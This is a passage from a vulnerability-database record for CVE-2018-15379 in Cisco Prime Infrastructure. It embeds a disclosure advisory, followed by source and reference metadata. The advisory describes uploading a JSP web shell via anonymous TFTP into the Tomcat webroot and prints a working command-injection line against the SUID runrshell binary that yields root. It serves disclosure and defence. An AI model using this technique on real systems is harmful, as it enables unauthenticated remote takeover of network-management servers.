Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. \nDevice Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. \nLarge or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control.\"\n\n\n\u003e\u003e Background and summary:\nCisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. \n\nA Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit\u0027s repository in the coming weeks. \n\nA special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2]. \n\n\n\u003e\u003e Technical details:\n#1\nVulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat\nCVE-2018-15379\nAttack Vector: Remote\nConstraints: None\nAffected products / versions:\n- Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected\n\nMost web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-\u003cVERSION\u003e/webapps. One of these applications is \"swimtemp\", which symlinks to /localdisk/tftp:\n\nade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/\ntotal 16\ndrwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT\ndrwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO\nlrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -\u003e /opt/CSCOlumos/wars/SSO-13.0.201.war\ndrwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest\nlrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -\u003e /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war\nlrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -\u003e /localdisk/tftp/\ndrwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacs\nlrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -\u003e /opt/CSCOlumos/wars/webacs.war\n\nAs the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections:\n/usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp\n\nThe tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory. \n\nThe web shell will then be available at https://\u003cIP\u003e/swimtemp/\u003cSHELL\u003e, and it will execute as the \"prime\" user, which is an unprivileged user that runs the Apache Tomcat server. \n\n\n#2\nVulnerability: runrshell Command Injection\n(no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1)\nAttack Vector: Local\nConstraints: None\nAffected products / versions:\n- Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected\n\nThe CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below:\n\nint main(int argc, char* argv, char* envp)\n{\n char dest;\n int i;\n\n setuid(0);\n setgid(0);\n setenv(\"PATH\", \"/opt/CSCOlumos/rcmds\", 1);\n memcpy(\u0026dest, \"/bin/bash -r -c \\\"\", 0x12uLL);\n for ( i = 1; argc - 1 \u003e= i; ++i )\n {\n strcat(\u0026dest, argv[i]);\n strcat(\u0026dest, \" \");\n }\n strcat(\u0026dest, \"\\\"\");\n return (system(\u0026dest) \u0026 0xFF00) \u003e\u003e 8;\n}\n\nAs it can be seen above, the binary uses the system() function to execute:\n/bin/bash -r -c \"\u003cCMD\u003e\"\n\n... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc. \n\nHowever, due to the way system() function calls \"bash -c\", it is trivial to inject a command by forcing an end quote after \u003cCMD\u003e and the bash operator \u0027\u0026\u0026\u0027:\n[prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell \u0027\" \u0026\u0026 /usr/bin/whoami #\u0027 \nroot\n\n\n\u003e\u003e Fix: \nVulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. \nVulnerability #2 does not appear to have been fixed as of the last update of this advisory. \n\nPlease note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor\u0027s responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. \n\n\n\u003e\u003e References:\n[1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html\n[2] https://blogs.securiteam.com/index.php/archives/3723\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb\n[4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "BID",
"id": "105506"
},
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-125632",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-15379",
"trust": 3.1
},
{
"db": "BID",
"id": "105506",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1041816",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "45555",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "149714",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "149727",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "150287",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-97589",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-125632",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "BID",
"id": "105506"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"id": "VAR-201810-0571",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:33:41.600000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20181003-pi-tftp",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp"
},
{
"title": "Cisco Prime Infrastructure Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=85393"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.1
},
{
"problemtype": "CWE-275",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/105506"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/45555/"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1041816"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-15379"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15379"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
},
{
"trust": 0.2,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.2,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://blogs.securiteam.com/index.php/archives/3723\u0027"
},
{
"trust": 0.1,
"url": "https://raw.githubusercontent.com/pedrib/poc/master/advisories/cisco-prime-infrastructure.txt\u0027"
},
{
"trust": 0.1,
"url": "https://seclists.org/fulldisclosure/2018/oct/19\u0027],"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp\u0027"
},
{
"trust": 0.1,
"url": "https://\u003cip\u003e/swimtemp/\u003cshell\u003e,"
},
{
"trust": 0.1,
"url": "https://raw.githubusercontent.com/pedrib/poc/master/exploits/metasploit/cisco_prime_inf_rce.rb"
},
{
"trust": 0.1,
"url": "https://blogs.securiteam.com/index.php/archives/3723"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/)"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/"
},
{
"trust": 0.1,
"url": "https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "BID",
"id": "105506"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-125632"
},
{
"db": "BID",
"id": "105506"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
},
{
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-125632"
},
{
"date": "2018-10-03T00:00:00",
"db": "BID",
"id": "105506"
},
{
"date": "2019-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"date": "2018-11-13T03:15:00",
"db": "PACKETSTORM",
"id": "150287"
},
{
"date": "2018-10-08T16:15:09",
"db": "PACKETSTORM",
"id": "149714"
},
{
"date": "2018-10-09T19:22:22",
"db": "PACKETSTORM",
"id": "149727"
},
{
"date": "2018-10-05T14:29:07.013000",
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"date": "2018-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-125632"
},
{
"date": "2018-10-03T00:00:00",
"db": "BID",
"id": "105506"
},
{
"date": "2019-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013332"
},
{
"date": "2019-10-09T23:35:29.313000",
"db": "NVD",
"id": "CVE-2018-15379"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "150287"
},
{
"db": "PACKETSTORM",
"id": "149714"
},
{
"db": "PACKETSTORM",
"id": "149727"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Prime Infrastructure for HTTP web Server permission vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013332"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-179"
}
],
"trust": 0.6
}
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.